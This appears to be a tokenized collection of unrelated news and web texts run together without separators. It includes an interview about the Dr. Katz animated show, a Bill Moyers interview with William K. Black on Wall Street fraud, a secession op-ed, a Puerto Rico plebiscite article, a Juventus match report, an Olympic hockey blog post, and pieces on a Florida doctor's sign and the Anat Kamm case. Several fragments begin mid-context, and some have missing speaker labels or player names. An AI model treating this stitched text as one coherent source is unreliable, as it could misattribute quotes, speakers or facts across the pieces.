DI : Much of each episode was n't scripted .
Can you talk about the process ?
How did the stories evolve ?
TS : We 'd give Comedy Central an outline , not a script .
So the show was about 60 - 70 % off script by the time we were done .
We had awfully good improvisers .
For the first couple years , I 'd write an outline about the story .
Then , John Katz and I would meet in a bar and I 'd read the outline to him .
And he'd say funny things , so I 'd jot them down .
And then they became part of an expanded outline .
And then I 'd go home and retype it bring it back to him and he'd say even funnier things .
So the outline would evolve that way .
And then we 'd bring people into the booth , the regulars , John Benjamin , Laura Silverman , and they 'd improv off it .
Then we brought the comedians in .
Initially we'd have them go in the booth with John [ Katz ] because they were in therapy .
He played the therapist and they
played the patients .
We did that twice , but it just did n't work .
The rhythm and pace got all f-ed up .
It was n't singing at all .
So when Ray Ramono came in -- one of our first patients -- we said , ' Ray , just come in and do your routine .
And we were smart enough to bring employees from my company and have them sit in the control room outside the booth so Ray would be performing .
Comedians are funnier when they have an audience .
So they would do 20 minutes and then we would repurpose it after they were gone .
We 'd have Jonathan sit in the booth and we'd stop and start and stop and start the tape and have him drop in vocals as setups , to make it sound like a therapy session .
And that worked like a charm for 6 years .
DI : There were so many amazing stand - up comedians on Katz 's couch .
Everyone from Steven Wright to Jeff Garlin , from Sarah Silverman to Conan O'Brien .
You also had literary luminaries like David Mamet and one of Hollywood 's tallest actors , Jeff Goldblum .
How did you get all those amazing people to
come in and sit on the couch ?
Two words : Jonathan Katz .
At the time we did the show , he was the guy
referred to as " the comic 's comic . "
He 's very smart , very sweet , and
gentlemanly , very funny and he'd worked with everybody during the 80s and
early 90s and everyone wanted to be on the show .
Early on , he brought in a
couple of his buddies like Ray Ramono and Dom Irrera Once word - of - mouth
caught on , we could have any comedian we wanted .
Sometimes they got in
touch with us , sometimes we got in touch with them .
Winona Rider , David
Duchovny , Jeff Goldblum , they all got in touch with us .
The only person we
could n't get , who I really wanted , was Bob Newhart .
I 'm not sure he got
the humor of the show .
DI : Did Comedy Central ever censor content ?
Not really .
Although there was this one time when we had a gay comedian
from Boston come in with his real - life lover to do couples therapy .
They
were both very smart and very funny but one of the things that came out in
the course of their session was that not only was one of the guys dying ,
but he was probably going to die soon .
For me it was magical - the way they
were talking and joking about it .
They had just gone out shopping for an
urn for the ashes and the guy said he 'd decided not to buy the urn because
it made him look wide at the hips .
So it was funny , and moving and , at the
time , Comedy Central would put anything we did on the air with no notes .
We had an awesome amount of freedom with them .
But ultimately we decided not to do the episode because some of the younger producers on the show were a little embarrassed by the sentiment .
That was a big disappointment for me .
But all we ever heard from Comedy Central was to make it dirtier !
We were too clean for them .
DI : So what are you working on these days ?
TS : John [ Katz ] and I are forever pitching shows .
And I 've got my own company now and I 'm writing and hoping to produce a musical comedy for the stage .
I 'm not Jewish , I 'm not gay , I do n't live in New York City - really , I have no right to be doing this .
But musicals are my first love , so I 'm writing this show about a guy who 's an extremely good liar , an impulsive liar .
He can't stand when people are sad around him , so he lies to make people feel better .
And ultimately he gets in trouble because he's in over his head and falls in love with someone he 's been lying to .
So it 's the story about my life , essentially .
Jeff Garlin on the Dr.'s couch
PBS Video : Bill Black with Bill Moyers
---
On Thursday , April 22 , President Barack Obama made the case for increased regulation of the financial industry in a televised speech at Cooper Union in New York City .
It was widely billed as President Obama 's chance to harness the momentum behind reforming Wall Street and move forward the bills being considered in the House and Senate .
Those measures face stiff opposition from most of the Republican Party and an army of lobbyists from Wall Street who have the ear of members of Congress on both sides of the aisle .
William K. Black thinks President Obama did n't acknowledge a key component in the financial crisis that the bills before Congress wo n't address — fraud .
A former regulator who helped crack down on massive fraud during the savings and loan crisis in the 1980s , Black tells Bill Moyers on THE JOURNAL that , despite evidence of fraud at the top banks , prosecutions seem far away .
" If you go back to the savings and loan debacle , we got more than a thousand felony convictions of the elite .
These are not , you know , tellers or something .
We today have zero convictions , zero indictments , zero arrests of any of the elite , non-prime lenders that , through their fraud , drove this crisis . "
April 23 , 2010
BILL MOYERS : Welcome to the JOURNAL .
We 'll get to two big battles in Washington in just a moment -- financial reform and the future of the internet .
But first , I want to thank those of you who wrote after you heard me say last week that the JOURNAL will come to an end with next Friday 's broadcast .
It 's true , and all of us here were touched by your messages of regret .
I will miss the virtual community of kindred spirits that has grown up around this broadcast -- viewers like you , as we say , whose unseen but felt presence reminds me of why I have kept at this work so long .
But it has been a long time , and that 's why I can assure you that my departure is entirely voluntary .
Many of you wrote to say you were alarmed at the possibility that we are being pushed off the air -- that higher ups or dark powers pointed to the door and said , " Go . "
You can relax ; it did n't happen .
I 'm leaving for one reason and one reason alone : it 's time .
Believe me , it was n't an easy decision : I like what I do , cherish my colleagues and enjoy your company .
But I 'll be 76 in a few weeks , and there are some things I want to do that the deadlines and demands of a weekly broadcast make impossible .
So for me , it 's now or never .
I informed public television of my decision more than a year ago , intending to leave back in December .
But my colleagues at PBS asked me to extend the series four more months to give them time to prepare a new public affairs series .
More on that next week .
Now to the big rumble of this week -- and I 'm not talking about that volcano in Iceland .
I 'm talking about the fight to reform our financial system .
PRESIDENT BARACK OBAMA : There is no dividing line between Main Street and Wall Street .
BILL MOYERS : You probably heard the President speaking in New York yesterday , stumping for more regulation of Wall Street :
You 've also probably heard about the government 's charge that Goldman Sachs committed a highly sophisticated fraud .
The claim is that this kingpin of Wall Street made a bundle by packaging mortgage debt as exotic investments some in the firm knew would fail .
That word " fraud " pops up more and more as we dig deeper into Wall Street 's outrageous behavior during the run up to the great collapse of 2008 .
We heard it right here on the Journal , one year ago .
WILLIAM K. BLACK
Fraud is deceit .
And the essence of fraud is , " I create trust in you , and then I betray that trust , and get you to give me something of value . "
And as a result , there 's no more effective acid against trust than fraud , especially fraud by top elites , and that 's what we have .
BILL MOYERS : That was Bill Black , who 's no stranger to bank investigations .
He was a senior regulator for the Federal Home Loan Board who cracked down on banking during the Savings & Loan crisis of the 1980s .
Just this week , he was on Capitol Hill testifying about another failed financial firm , Lehman Brothers .
WILLIAM K . BLACK Lehman 's failure is a story in large part of fraud .
And it is fraud that begins at the absolute latest in 2001 .
BILL MOYERS : Bill Black is with me now .
One of the country 's leading experts on crimes in high places he teaches economics and law at the University of Missouri - Kansas City , and wrote this book , THE BEST WAY TO ROB A BANK IS TO OWN ONE .
Welcome back to the JOURNAL .
WILLIAM K. BLACK
Thank you .
BILL MOYERS : What did you think of the President 's speech late this week ?
WILLIAM K. BLACK
It 's a good speech .
He 's a very good spokesman for his causes .
I do n't think substantively the measures are going to prevent a future crisis .
And I was disappointed that he was n't willing to be blunt .
He used a number of euphemisms , but he was unwilling to use the F word .
BILL MOYERS : The F word ?
WILLIAM K. BLACK
The F word 's fraud in this .
And it 's the word that explains why we have these recurrent , intensifying crisis .
BILL MOYERS : How is that ?
What do you mean when you say fraud is at the center of it ?
WILLIAM K . BLACK
Well , first , when you deregulate or never regulate , mortgage bankers were never regulated , you effectively have decriminalized that industry , because only the regulators can serve as the sherpas , that the FBI and the prosecutors need to be able to understand and prosecute these kind of complex frauds .
They can do one or two or maybe three on their own , but when an entire industry is beset by wide scale fraud , you have to have the regulators .
And the regulators were the problem .
They became a self - fulfilling prophecy of failure , because they , President Bush appointed people who hated regulation .
I call them the anti-regulators .
And that 's what they were .
BILL MOYERS : This hearing that , where you testified this week , looking into the bankruptcy at Lehman Brothers , had something on this .
TIMOTHY GEITHNER :
And tragically , when we saw firms manage themselves to the edge of failure , the government had exceptionally limited authority to step in and to protect the economy from those failures .
BEN BERNANKE : In September 2008 , no government agency had sufficient authority to compel Lehman to operate in a safe and sound manner and in a way that did not pose dangers to the broader financial system .
ANTON VALUKAS :
What is clear is that the regulators were not fully engaged and did not direct Lehman to alter the conduct which we now know in retrospect led to Lehman 's ruin .
BILL MOYERS : The regulators were not fully engaged .
I mean , this is an old story .
We all know about regulatory capture where the regulated take control of the regulators .
WILLIAM K. BLACK
Yeah , but this one is far worse .
That 's not very candid testimony on anybody 's part there .
The Fed had unique authority .
And it had it since 1994 to regulate every single mortgage lender in America .
And you might think the Fed would use that authority .
And you might especially think that , if you knew that Gramlich , one of the Fed members , went personally to Alan Greenspan and said , there 's a housing bubble .
And there 's a terrible crisis in non-prime .
We need to send the examiners in .
We need to use our regulatory authority .
And Greenspan refused .
Lehman was brought down primarily by selling liar 's loans .
It was the biggest seller of liar 's loans in the world .
And when we look at these liar 's loans , we find 90 percent fraud .
90 percent .
And we find that most of the frauds are not induced by the borrower , but they 're overwhelmingly done by the loan brokers .
BILL MOYERS : And liar 's loans are ?
WILLIAM K. BLACK
A liar 's loan is we do n't get any verified information from you about your income , your employment , your job history or your assets .
BILL MOYERS : You give me a loan , no questions asked ?
WILLIAM K. BLACK
No real questions asked .
Certainly no answers checked .
In fact , we just had hearings last week about WaMu , which is also a huge player --
BILL MOYERS : Washington Mutual --
WILLIAM K. BLACK -- in these frauds .
Washington Mutual , which used to make , run all those ads making fun of bankers who , because they were stuffy and looked at loan quality before they made a loan .
Well , WaMu did n't do any of that stuff .
And of course , WaMu had just massive failures .
And who got in trouble at WaMu ?
Who got in trouble at Lehman ?
You got in trouble if you told the truth .
They fired the people who found the problems .
They promoted the people that caused the problem , and they gave them massive bonuses .
BILL MOYERS : I watched the testimony where you were present the other day in the Lehman hearings .
And there was a very moving moment with a former vice - president of Lehman Brothers who had gone and tried to blow the whistle , who tried to get people to pay attention to what was going on .
Take a look .
MATTHEW LEE : I hand - delivered my letter to the four addressees and I 'll give a quick timeline of what happened , May 16th was a Friday , on the Monday I sat down with the chief risk officer and discussed the letter , on the Wednesday I sat down with the general counsel and the head of internal audit , discussed the letter .
On the Thursday I was on a conference call to Brazil .
Somebody came into my office , pulled me out , and fired me on the spot with out any notification .
I stayed , sorry .
BILL MOYERS : Matthew Lee , vice - president of Lehman Brothers , fired because he tried to blow the whistle .
What does that say to you ?
WILLIAM K . BLACK
Well , it tells me that they were covering up the frauds , that they knew about the frauds and that they were desperate to prevent other people from learning .
BILL MOYERS : Matthew Lee told the accounting firm Ernst & Young what was going on .
Is n't the accounting firm supposed to report this , once they learn from somebody like him that there 's fraud going on ?
WILLIAM K. BLACK
Yes , they 're supposed to be the most important gatekeeper .
They 're supposed to be independent .
They 're supposed to be ultra-professional .
But they have an enormous problem , and it 's compensation .
And that is , the way you rise to power within one of these big four accounting firms is by being a rainmaker , bringing in the big clients .
And so , every single one of these major frauds we call control frauds in the financial sphere has been -- their weapon of choice has been accounting .
And every single one , for many years , was able to get what we call clean opinions from one of the most prestigious audit firms in the world , while they were massively fraudulent and deeply insolvent .
BILL MOYERS : I read an essay last night where you describe what you call a criminogenic environment .
What is a criminogenic environment ?
WILLIAM K . BLACK
A criminogenic environment is a steal from pathology , a pathogenic environment , an environment that spreads disease .
In this case , it 's an environment that spreads fraud .
And there are two key elements .
One we talked about .
If you do n't regulate , you create a criminogenic environment because you can get away with the frauds .
The second is compensation .
And that has two elements .
One is the executive compensation that people have talked about that creates the perverse incentives .
But the second is for these professionals .
And for the lower level employees , to give the bonuses .
And it creates what we call a Gresham 's dynamic .
And that just means cheaters prosper .
And when cheaters prosper , markets become perverse and they drive honesty out of the market .
BILL MOYERS : You also wrote that the New York Federal Reserve knew about this so - called three - card monte routine .
But that , the man who led it , at the time , Timothy Geithner , now the treasury secretary , testified that there was nothing he could do .
TIMOTHY GEITHNER :
In our system the Federal Reserve was a fire station , a fire station with important , if limited , tools to put foam on the runway , to provide liquidity to markets in extremis .
However , the Federal Reserve , under the laws of this land was not given any legal authority to set or enforce limits on risk - taking by large financial institutions like the independent investment banks , insurance companies like AIG , Fannie and Freddie , or the hundreds of non-bank financial firms that operated outside the constraints of the banking system .
BILL MOYERS : Now , what I hear is the gentleman who was then chairman of the New York Fed , saying , I , we had this job to do , but we did n't have the authority to do it .
WILLIAM K. BLACK Yeah .
BILL MOYERS :
We were the fire truck , but we did n't have any water in our hose .
WILLIAM K . BLACK
Yeah , this was pretty disingenuous , because other portions of his testimony , he explained why there was this gap .
And he said it was because we repealed Glass - Steagall .
Well , the Fed pushed for the repeal of Glass - Steagall .
BILL MOYERS : Glass - Steagall was the act that was repealed in the late nineties that separated regular banks from investment banks , right ?
WILLIAM K. BLACK Correct .
So this is a deliberately created regulatory black hole , created by the Fed .
And then the Fed comes into the hearing , eight years later , and said , we were helpless .
Helpless to do anything , because of a black hole we designed .
BILL MOYERS : Well , it does n't stop there , because as I listened the other day , I heard that the Securities and Exchange Commission knew that Lehman was repeatedly ignoring its own risks , but it did nothing .
Here 's what the new chairman of the SEC , Mary Schapiro , had to say the other day , about why the commission fell down on the job .
Take a look .
MARY SCHAPIRO :
The SEC did n't have the staff , the resources , or quite honestly , in some ways , the mindset to be a prudential regulator of the largest financial institutions in the world .
It was such a deviation from our historic disclosure - based and rules - based approach to regulation to come in and be a prudential supervisor .
The staff was never given the resources .
This program peaked at 24 people for the entire universe of the five largest investment banking firms in the world .
WILLIAM K . BLACK
Well , this is another example , the self - fulfilling failure .
This was n't done under Mary Shapiro 's watch .
BILL MOYERS : Right --
WILLIAM K. BLACK
This was Chris Cox , who was Bush 's appointment .
And he 's the one who decided , we 're only going to send 24 people to deal with all of the largest investment banks in the world .
Now that 's a farce .
And everybody knows it 's a farce .
He did n't want effective regulation .
We both spent time , considerable time , in Texas .
And you know , the joke , one riot , one ranger , right ?
BILL MOYERS : Texas ranger , right .
WILLIAM K. BLACK Treasury Secretary Geithner testified that in the circumstances they were dealing with at Lehman , " We were on the brink of the destruction of the entire global financial system . "
And then Chairman Bernanke testified how many people the Fed sent to Lehman to prevent us on the brink of global collapse .
BILL MOYERS : And how many ?
WILLIAM K. BLACK
Two .
They have a staff of thousands .
This is criminal negligence except , because he 's a federal employee , we can't charge him with a crime .
BILL MOYERS : Let 's talk a moment about the government 's allegations against Goldman Sachs .
I mean , I get dizzy just reading about it .
But the Wall Street Journal reporters did a terrific job this week of trying to sort it out .
And they say , " It centers on a deal Goldman Sachs crafted , so that the hedge fund king , John Paulson , could bet on a collapse in housing prices . "
Is that your reading of it ?
WILLIAM K. BLACK
Yes , I mean , the complaint actually focuses on lying to investors .
So it 's a very traditional securities fraud complaint .
BILL MOYERS : Not about Paulson , by the way .
He 's not mentioned in the complaint .
WILLIAM K. BLACK
No , but that 's really interesting .
And as to whether he will be mentioned eventually in this complaint , because Paulson has lots of potential liability on this one .
John Paulson was allowed by Goldman , indeed encouraged by Goldman , to create a " Most Likely to Fail " list .
So he took , within a particular category , the absolute worst stuff , because he wanted to bet that the stuff would fall in value .
And they were certain to fall in value in terms of the economics .
BILL MOYERS : Was n't he betting that people would n't be able to pay their mortgages ?
WILLIAM K . BLACK
Not even necessarily that , because most of these are liar 's loans , again .
And they will not pay , right ?
It 's not an issue of liar 's loans , will it work or will it not work .
It 's only when will it blow up .
A liar 's loan will blow up .
If housing prices keep going up for three years hugely , then they will blow up in the fourth year .
But they will blow up .
So he was betting against something that he knew was going to blow up .
He did n't necessarily know the timing , but he proved to be right about the timing , because we know from the SEC complaint that he was in a rush to get this .
He knew that the housing collapse was imminent .
And he had to get this deal done right away .
And Goldman Sachs felt the same thing .
So they went and they got themselves a dupe , ACA .
And they told the -- ACA is a group that puts together and supposedly checks the quality of mortgages .
Not very well , as it turned out , of course .
An investor would obviously want to know that this portfolio was picked to fail .
Instead , they were told , according to the SEC complaint , " No , no , no , no .
There 's no John Paulson out there .
There 's only ACA , and it 's in your corner .
And it 's picking a portfolio most likely to succeed . "
Now if John Paulson knew that Goldman was making those representations , then John Paulson knew those representations were false .
And that could make him an aider and abettor .
BILL MOYERS : So tell me where the fraud might be in there , if the government proves its case .
WILLIAM K . BLACK
Well , the fraud is , I 'm representing to you , the potential investor , that a competent professional independent firm , ACA , looking after your interests , has picked this portfolio because they believe it 's most likely to succeed .
When in fact , the portfolio was selected overwhelmingly by Paulson and was selected because it was deliberately chosen to fail .
BILL MOYERS :
The complaint names only one person , Fabrice Tourre , if I get the name correct .
WILLIAM K. BLACK
That is correct .
BILL MOYERS : Who was 27 at the time .
Would he have been acting without supervision on a deal of that enormity ?
WILLIAM K. BLACK
Oh , not even close .
And this was -- this was part of a package of about 18 deals as well .
So as big as this package was , and it was huge , the overall package was absolutely the type of thing that received personal attention of the leaders , the absolute top leaders at Goldman Sachs .
So it 's very curious to me that the SEC has failed to name the higher - ups .
BILL MOYERS : Why did it take so long for the Securities and Exchange Commission , the SEC , to kick into gear on this ?
I mean , have they kicked into gear ?
WILLIAM K . BLACK
Well , they have n't kicked into gear fully , or they'd be naming Blankfein and other senior leaders of Goldman .
And they 've , as you just mentioned , they 've only gone after a junior person .
And there would be , if they were really in gear , there would be criminal charges here .
And if they were really in gear , there 'd be a broad investigation , not just of Goldman , but of all of these major entities .
In the last three weeks , we have finally done a half - baked investigation , mind you .
Not -- nothing like we did in the Savings & Loan days -- of Washington Mutual ( WaMu ) , Citicorp , Lehman , and Goldman .
And we have found strong evidence of fraud at all four places .
And we have looked previously at Fannie and Freddie and found the same thing .
So the only six places we 've looked , at really elite institutions , we 've found strong evidence of fraud .
So where are the other investigations ?
Why are there no arrests ?
Why are there no convictions ?
BILL MOYERS : Well , Bill , where are the other investigations ?
Why have there been no arrests ?
Why have there been no convictions ?
WILLIAM K . BLACK
Because we have still Bush 's wrecking crew in charge of the key regulatory agencies .
Why are they still in place ?
They have abysmal records as major causes of this crisis .
BILL MOYERS : You talk about the Bush appointees still being there , but Goldman 's former lobbyist , his treasury secretary , Timothy Geithner 's chief of staff , the head of the Commodity Futures Trading Commission , Gary Gensler , who may soon have new power over derivatives , worked for Goldman .
So did the deputy director of the White House National Economic Council , the under Secretary of State is a former Goldman employee .
Goldman 's hired Barack Obama 's recent chief counsel from the White House on his defense team .
I mean --
WILLIAM K. BLACK
Do n't forget Rubin .
BILL MOYERS : Robert Rubin , whose influence is all over the place , who used to be --
WILLIAM K . BLACK
It 's his protégés that are in charge of economic policy , under Obama .
BILL MOYERS : So is this administration , which still has some Bush holdovers in it , and now has a lot of Goldman people in it , is this administration going to be able to pass judgment on Goldman Sachs ?
WILLIAM K. BLACK
Well , so far , they have n't been able to do it .
They can't even get themselves to use the word fraud .
There 's a huge part that is economic ideology .
And neoclassical economists do n't believe that fraud can exist .
I mean , they just flat out -- the leading textbook in corporate law from law and economics perspective by Easterbrook and Fischel , says -- I 'll get pretty close to exact quotation .
" A rule against fraud is neither necessary nor particularly important . "
Right ?
Notice how extreme that statement is .
We do n't need laws .
We do n't need an FBI .
We do n't need a justice department .
We do n't even need rules like the SEC .
The markets cleanse themselves automatically and prevent all frauds .
This is a spectacularly naïve thing .
There is enormous ideological content .
And it fits with class .
And it fits with political contributions .
Do you want to look at these seemingly respectable huge financial institutions , which are your leading political contributors as crooks ?
BILL MOYERS : TheHill.com website says Goldman
Sachs is uniquely positioned to fight this case , that it spent $ 18 million over the last decade lobbying members of Congress , and put millions more in their campaigns .
I mean , you 've said elsewhere .
That 's smart business , right , to invest in the politicians who are going to be investigating you ?
WILLIAM K. BLACK
I would tell you , the Savings & Loan crisis , our phrase was , " The highest return on assets is always a political contribution . "
BILL MOYERS : Well , all right .
You 're a member of Congress .
The Supreme Court has said , " Goldman Sachs can spend all it wants in November to defeat you . "
Are you going to take them on ?
WILLIAM K . BLACK
Absolutely , but I would never be elected to Congress because of that .
So let me -- in terms of that Supreme Court decision , if corporations are going to be just like people , let me tell you my criminologist hat .
Then let 's use the three strike laws against them .
Three strike laws , you go to prison for life , if you have three felonies .
How many of these major corporations would still be allowed to exist , if we were to use the three strike laws , given what they 've been convicted of in the past ?
And in most states , they remove your civil rights when you 're convicted of a felony .
Well , let 's take away their right to make political contributions that they 're found guilty of a violation .
BILL MOYERS : Bill , are you describing a political culture , that is criminogenic ?
WILLIAM K. BLACK
It 's deeply criminogenic .
And this ideology that both parties are dominated by that says , " No , big corporations would n't cheat .
Fraud can't happen .
Market 's automatically excluded , " is insane .
We now have the entitlement generation as CEOs .
They just plain feel entitled to being wealthy as Croesus with no responsibility , no accountability .
They have become literal sociopaths .
So one of the things is , you clean up business schools , which right now are fraud factories at the senior levels , right ?
They create the new monsters that take control and destroy massive enterprises and cause global economic crises , cause the great recession .
And very , very close to causing the second Great Depression .
We just barely missed that .
And there 's no assurance that we 've missed it five years out .
BILL MOYERS : This brings us back to what the president said this week .
He said the crisis was born of a failure of responsibility from Wall Street to Washington .
You 've just described that .
That brought down many of the world 's largest financial firms and nearly dragged our economy into a second Great Depression .
But he did n't name names .
He does n't say who specifically was responsible .
You have .
But the president does n't name names .
WILLIAM K . BLACK
No , and one of the most important things a president has is the bully pulpit .
We have not heard speeches by the president demanding that the frauds go to prison .
We have not heard speeches from the attorney general of the United States of America , Eric Holder .
Indeed , we have n't heard anything .
It 's like Sherlock Holmes , the dog that did n't bark .
And that 's the dog that is supposed to be our guard dog .
It must bark .
And it must have teeth , not just bark .
BILL MOYERS : Bill Black , thank you for being back on the Journal .
WILLIAM K. BLACK
Thank you .
He writes :
I believe we are nearing a point where there are enough irreconcilable differences between those Americans who want to control other Americans and those Americans who want to be left alone that separation is the only peaceable alternative .
Just as in a marriage , where vows are broken , our human rights protections guaranteed by the U.S. Constitution have been grossly violated by a government instituted to protect them .
The Democrat - controlled Washington is simply an escalation of a process that has been in full stride for at least two decades .
There is no evidence that Americans who are responsible for and support constitutional abrogation have any intention of mending their ways …
Americans who wish to live free have several options .
We can submit to those who have constitutional contempt and want to run our lives .
We can resist , fight and risk bloodshed and death in an attempt to force America ’s tyrants to respect our liberties and human rights .
We can seek a peaceful resolution of our irreconcilable differences by separating .
Some independence movements , such as our 1776 war with England and our 1861 War Between the States , have been violent , but they need not be .
In 1905 , Norway seceded from Sweden ; Panama seceded from Columbia ( 1903 ) , and West Virginia from Virginia ( 1863 ) .
Nonetheless , violent secession can lead to great friendships .
England is probably our greatest ally .
The House voted Thursday to give Puerto Rico a nonbinding vote on its status , marking the beginning of a process that could eventually lead to a 51st state .
The bill sets up a two - vote process .
Puerto Ricans would first vote on whether to change commonwealth status and , if so , a second vote would be held at a later date on whether to request Congress grant statehood .
“ It is time for this Congress to hear from the people of Puerto Rico , ” said Pedro R. Pierluisi , Puerto Rico ’s delegate to Congress and a Democrat , who led the fight on the bill , which passed on a bipartisan vote of 223-169 .
The bill ’s supporters broke into applause on the House floor when the tally was announced .
But the bill passed only after opponents won a change that allows a second vote to include the option to keep the current commonwealth status as one of four choices on the ballot .
The other three would be statehood , full independence , the current status , or sovereignty that includes some sort of association with the U.S .
The plebiscites are nonbinding , and Congress would still have final say over any changes to the island ’s status .
It would take a majority vote and the president ’s signature to grant statehood .
Puerto Ricans are U.S. citizens and can , for example , run for president .
But those who live on the island do n’t pay federal income taxes , they do n’t vote for president , and their delegate to Congress , Mr. Pierluisi , does not have a vote on the floor .
They are also treated differently on other matters , such as not gaining the same sort of guaranteed coverage and subsidies that were provided in the new health care law .
Since being established as a commonwealth in 1952 , Puerto Rico has voted three times on statehood , with votes failing in 1967 , 1993 and 1998 .
The 1998 vote in favor of statehood was 47 percent , while “ none of the above , ” the choice for remaining a commonwealth , earned 50 percent .
Polling taken within the past year suggests support for statehood still hovers near 50 percent .
Opposition to the bill came from various quarters .
Some Republicans worried that the plebiscites would lead to statehood and the Spanish - speaking territory would deal a blow to efforts to make English the official language of the U.S.
Other opponents feared the costs of adding a 51st state , should that option prevail .
But the biggest threat to the bill came from a bipartisan group that said the original two - tier structure of the Puerto Ricans ’ vote was designed to ensure statehood won .
As originally written , the bill also called for a vote on whether to change the island ’s status .
But if that won , the second vote would only include “ change ” options - independence , statehood or sovereigh association .
Opponents said the original process almost guaranteed that statehood would win .
“ It ’s the only result you can possibly expect .
The deck is stacked , we all know , ” said Rep. Luis V. Gutierrez , the Illinois Democrat who led opposition to the bill and whose parents were from Puerto Rico .
He also blamed his own party leaders for blocking many of the amendments he had tried to offer on the floor and compared his party ’s leadership unfavorably to Republicans , who in 1998 , the last time Congress considered the issue , allowed for a much more free - wheeling debate .
Those opponents managed to put the commonwealth option back in to the second plebiscite question , winning that amendment 223-179 .
Sign up for Daily Newsletters Manage Newsletters
Copyright © 2020 The Washington Times , LLC .
Click here for reprint permission .
The Bianconeri are still in the hunt for Europe 's top competition as the season continues to wind down .
As the match started there were problems in midfield for coach Alberto Zaccheroni , as Felipe Melo and Mohamed Sissoko were suspended .
Meanwhile , David Trezeguet and Zdenek Grygera continued to be sidelined .
Bari boss Giampiero Ventura stayed with his usual 4 - 4 - 2 setup , but was without long - term absentee Andrea Ranocchia and striker Vitaly Kutuzov .
The first chance fell to the visitors after ten minutes , as Vladimir Koman swooped in for a flying header , but Gianluigi Buffon got down well to parry the ball away .
The hosts almost opened the scoring when Paolo De Ceglie 's low cross into the area had the defence scrambling , but a crowded out Amauri just failed to get a touch and the ball bobbled out of play .
Juventus were turning up the pressure as the midfield trio Diego , Claudio Marchisio , and Mauro Camoranesi controlled the first - half and the latter 's cross found an unmarked Amauri , but he could n't direct his header on target from 12 yards away .
After half an hour , Diego and Marchisio linked up well before Jean - Francois Gillet saved the Brazilian 's daisy - cutter from just outside the area .
The last chance of the first - half was arguably it 's best and it surprisingly fell to the Galletti .
Sergio Almiron 's through pass found the galloping Alvarez breakinginto the box , who touched it to Koman , but Buffon was there to deny the Hungarian once again .
Despite long spells of possession , Juventus went into the half - time break on level terms .
Zaccheroni made a double change to start the second - half with Antonio Candreva and Vincenzo Iaquinta replacing Camoranesi and Amauri .
His side nearly opened the scoring , but Giorgio Chiellini was robbed from close range by Gillet .
Somehow Alessandro Del Piero failed to score from inside the six yard box on 48 minutes .
Diego set up
De Ceglie on the flank and his pinpoint cross found the captain , but his header slammed off the crossbar .
Finally , the Bianconeri got the breakthrough from substitute .
Diego burst forward on the counter and chipped through for the striker , who rounded Gillet and dispatched the ball into the net .
Diego thought he was on the scoreboard after 65 minutes , but it was ruled out for offside .
The former Werder Bremen star slalomed through the backline before laying off for Iaquinta , and the striker 's shot deflected off the playmaker before going into the net .
Juventus were not denied a second for much longer , as they hit quickly on the counter and Gillet took down Diego in the box .
slotted the penalty home for a 2 - 0 lead .
It was easy enough for the hosts to hold on to the lead from that point , butadded another for good measure by tapping in Candreva 's assist with five minutes remaining .
Therefore , Juventus kept their Champions League hopes alive with three games remaining , while Bari slumped to their fourth straight defeat in Serie A. Keep up to date with Serie A and Italy news with Goal.com 's Italy page and join Goal.com USA 's Facebook fan page
There was so much hype leading up to this game tonight , including a great tribute to the 1980 Miracle on Ice on NBC earlier this afternoon .
I could n't help but wonder if the game would live up to the hype it was getting and it did n't let down .
Canada was clearly the more talented hockey team but Ryan Miller was clearly the best player on the ice .
Miller played like we have all seen him play before and the United States now find themselves in a great position to medal after beating Canada 5 - 3 .
I do n't want to bore you with details of the actual game because it is impossible to accurately describe the level of competition and the determination we seen on the ice tonight .
If you did not watch the game tonight ... then shame on you .
If you are a hockey fan and you did not watch the game , I do n't even know what to say to you .
I 'd be remiss if I did n't mention how good Brian Rafalski played ( 2 goals and just generally very good in both ends of the rink ) and how Chris Drury is proving me wrong for questioning his spot on the team .
I still have no regrets the Sabres lost Drury but he was amazing tonight .
Even if he had n't scored a goal I would be complimenting his play .
He was one of the most visible players on the ice for either team and his leadership was noticeable .
It was great to see him and Miller share a big hug when the final horn sounded .
Many people are saying this was the greatest game they ever seen .
Personally I 'm not willing to go that far but what do you think ?
Follow the jump for a couple more notes on the game .
What is more shocking than the United States upset victory of Canada is what this means for the rest of the tournament .
The loss by Canada sets up a quarter - final matchup that will feature Canada versus Russia .
Coming into the tournament they were expected to be the top two candidates to take home the Gold Medal and now one of the two will not even make the semi-finals .
Consider me to be the most shocked at that development .
The United States will be anxiously awaiting the outcome of the Finland - Sweden game this evening to find out if the will be the number one or number two seed heading forward .
The number one seed will have a much easier time because they will face the winner of Switzerland and Belarus while the number two seed will probably have to play against a difficult Slovakian team .
Florida Doctor Tells Obama Supporters to ' Go Elsewhere ' for Care .
Is that Ethical ?
' World News ' wants to hear what you think .
April 2 , 2010  --
The sign on a Florida doctor 's door could n't be much clearer : " If you voted for Obama ... seek urologic care elsewhere .
Changes to your health care begin right now , not in four years . "
Dr. Jack Cassell defended his actions in a story in today 's Orlando Sentinel , saying he 's not actually denying care to anyone who comes to his office for treatment but wanted to send a message to people who supported the president 's health care overhaul efforts .
" I 'm not turning anybody away ; that would be unethical , " he told the Sentinel .
" But if they read the sign and turn the other way , so be it . "
Cassell is a registered Republican who practices in a predominantly conservative community in Mount Dora , Fla. , according to the newspaper .
He has also placed pamphlets in his waiting room displaying Republican messages on the health care plan .
Cassell 's sign raises questions about the line between free speech and medical responsibility .
Our question to you today :
Is Cassell 's message to Obama supporters to " go elsewhere " for care ethical -- or even legall ?
He said : " We have had disease before although nothing like this .
There were little insects in the trees and the wheat , but they are only harming the opium . "
" I said first this is a disease because of the insects .
Now people are saying foreigners have sprayed some kind of chemical from planes . "
What is misleadingly being called in Israel the " Anat Kamm espionage affair " is quickly revealing the dark underbelly of a nation that has worshipped for decades at the altar of a security state .
Next week 23 - year - old Kamm is due to stand trial for her life – or rather the state ’s demand that she serve a life sentence for passing secret documents to an Israeli reporter , Uri Blau , of the liberal Haaretz daily .
She is charged with spying .
Blau himself is in hiding in London , facing , if not a Mossad hit squad , at least the stringent efforts of Israel ’s security services to get him back to Israel over the opposition of his editors , who fear he will be put away too .
This episode has been dragging on behind the scenes for months , since at least December , when Kamm was placed under house arrest pending the trial .
Not a word about the case leaked in Israel until this week when the security services , who had won from the courts a blanket gag order – a gag on the gag , so to speak – were forced to reverse course when foreign bloggers began making the restrictions futile .
Hebrew pages on Facebook had already laid out the bare bones of the story .
So , now that much of the case is out in the light , what are the crimes committed by Kamm and Blau ?
